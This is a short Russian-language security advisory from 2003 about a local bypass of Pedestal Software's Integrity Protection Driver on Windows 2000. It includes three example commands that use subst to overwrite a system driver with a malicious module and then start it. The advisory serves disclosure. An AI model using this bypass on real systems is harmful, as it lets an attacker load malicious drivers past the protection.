Security Lab

Обход ограничений в Integrity Protection Driver

Дата публикации:07.01.2003
Всего просмотров:912
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная
Воздействие: Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Integrity Protection Driver 1.x
Описание: Pedestal Software Integrity Protection Driver – драйвер для Windows 2000, который защищает систему от установки новых сервисов и драйверов, а также защищает существующие драйвера.

Создавая символьную ссылку к каталогу драйверов Windows, нападающий может обойти IPD и перезаписать любой драйвер злонамеренным файлом. Пример:

$ subst x: c:\winnt\system32\drivers
$ copy badmodule.sys x:\ipnat.sys
$ net start ipnat
Уязвимость обнаружена в Pedestal Software Integrity Protection Driver 1.2-1.3
Ссылки: Another way to bypass Integrity Protection Driver ('subst' vuln)